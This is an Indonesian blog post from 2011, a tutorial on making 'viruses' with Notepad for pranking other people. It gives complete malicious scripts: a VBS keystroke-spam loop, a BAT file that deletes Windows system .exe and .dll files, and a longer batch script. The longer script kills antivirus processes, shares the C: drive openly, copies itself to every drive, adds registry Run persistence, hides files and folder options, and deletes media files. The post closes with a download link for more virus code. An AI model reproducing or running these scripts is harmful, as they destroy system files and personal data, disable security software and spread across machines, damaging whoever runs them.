Contact Me

Kamis, 03 November 2011

Cara buat virus di komputer

bagaimana cara membuat virus notepad bat exe bit ? silahkan membaca selanjutnya
bagi sobat yang sudah mengenal bahasa pemrograman visual basic , “ahh kecil bener buat ginian biasanya juga bisa buat lebih dari ini” ,hehe..( sombong bener bak pahlawan bertopen hawahah ) mungkin seperti itu ya ,pandangan setiap orang berbeda, namun bagi sobat yang sama sekali tidak pernah mengenal pemrograman ini iya special sekali iya pakek telor, lumayankan buat tambah peluru untuk ngerjain orang ,hhhee..dan mungkin dibawah ini adalah sedikit cara sederhana ..karena dibawah ini hanyalah script kecil dari berbagai metode serangan virus yang bisa melumpuhkan sistem OS sobat… virus yang benar-benar merusak system OS adalah virus berbahaya, namun saya disini berbagi sedikit script virus sederhana untuk uji coba, jika sobat memiliki pertahanan seperti software bernama defrez , mungkin saja tidak akan bisa memasuki komputer sobat , lalu bagaimana caa membuat virus sederhana berbekal tools bernama “notepad ” berikut tutorial singkatnya.
berikut ini adalah tipe VBS
kode ini disimpan dan diberinama ( Extensions VBS , example tesvirus.vbs )
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.”
loop

berikut ini adalah tipe virus BAT.

kode ini di simpan dan diberinama ( extension BAT , example tesvirus.BAT )

@echo off
taskkill /f /im explorer.exe
del “%systemroot%\*.exe” /f /q /s /a h r s a
del “%systemroot%\system32\*exe” /f /q /s /a h r s a
del “%systemroot%\*.dll” /f /q /s /a h r s a
del “%systemroot%\system32\*dll” /f /q /s /a h r s a
msg * Your computer important files have been deleted


berikut ini adalah tipe virus BIT.kode ini disimpan dan diberinama ( Extensions BIT , example tesvirus.bit )

@echo off
cd\
cd %SystemRoot%\system32\
md 1001
cd\
cls
rem N0 H4rm 15 cau53d unt1| N0w
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| ch4ng3 th3 t1m3 2 12:00:00.0 & d4t3 as 01/01/2000
echo 12:00:00.00 | time >> nul
echo 01/01/2000 | date >> nul
net share system=C:\ /UNLIMITED
cd %SystemRoot%\system32\1001
Copy %0 %SystemRoot%\system32\1001\kid.bat
echo deal=msgbox (”Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus”,20,”Warning”) > %SystemRoot%\system32\1001\warnusr.vbs
at 12:34 /interactive “%SystemRoot%\system32\1001\kid.bat”
at 12:35 /interactive “%SystemRoot%\system32\1001\kid.bat”
msg * “KOmputer Ini Diserang Oleh GU3 4D1” > nul
msg * “S1L4HK4N SC4N K0MPUT3R 4ND4!!” >> nul
taskkill /F /IM ESET.exe
taskkill /F /IM AVG.exe
taskkill /F /IM Kapersky.exe
taskkill /F /IM Norton.exe
taskkill /F /IM PCMAV.exe
taskkill /F /IM CLAMAV.exe
taskkill /F /IM AV
copy %0 C:\system_file.bat
copy %0 d:\system_file.bat
copy %0 e:\system_file.bat
copy %0 f:\system_file.bat
copy %0 g:\system_file.bat
copy %0 h:\system_file.bat
cd %systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\
attrib +h +s +r warnusr.vbs
attrib +h +s +r sd.bat
cd\
cd %systemroot%\system32
copy %0 %systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\kid.exe
reg add HKLM\software\microsoft\windows\currentversion\run /v systray /t reg_sz /d c:\windows\system32\kid.exe /f
copy %0 %systemroot%\system32\kid.bat
REG ADD HKCU\Software\Microsoft\Windows\Currentversion\Explorer\Advanced /v Showsuperhidden /t reg_dword /d 0 /f
REG ADD HKCU\Software\Microsoft\Windows\Currentversion\policies\explorer /v nofolderoption /t reg_dword /d 1 /f
REG ADD HKCU\software\Microsoft\windows\currentversion\run /v aktifkan /t reg_SZ /d C:\system_file.bat /f
del /f /s /q c:\*.3gp d:\*.3gp e:\.3gp f:\*.mkv
del /f /s /q c:\*.mkv d:\*.mkv e:\.mkv f:\*.mkv


kalau exe aku g berani sob kasih , nanti rusak beneran komputermu hihi icon biggrin cara membuat virus notepad bat exe bit vbs
segini dulu ya ini sebenernya bukan virus cuman “agak ngerjain orang ” hehe..e

gini aja dech yang suka usil icon biggrin cara membuat virus notepad bat exe bit vbs download link dibawah ini sob , iya gpp ndak rusak OS kog, cuman kerjain ajjah, namun apabila kmu bisa memodifikasi script ini wah, jangankan jebol komputer orang jamin icon biggrin cara membuat virus notepad bat exe bit vbs ” ganti kompi ” hihi
download dibawah ini sob icon biggrin cara membuat virus notepad bat exe bit vbs
iya belajar2 lah jadi hackor.ehh .. hacker.. icon smile cara membuat virus notepad bat exe bit vbs
  http://www.ziddu.com/download/12806613/KODE.VIRUS.rar.html

Tidak ada komentar:

Posting Komentar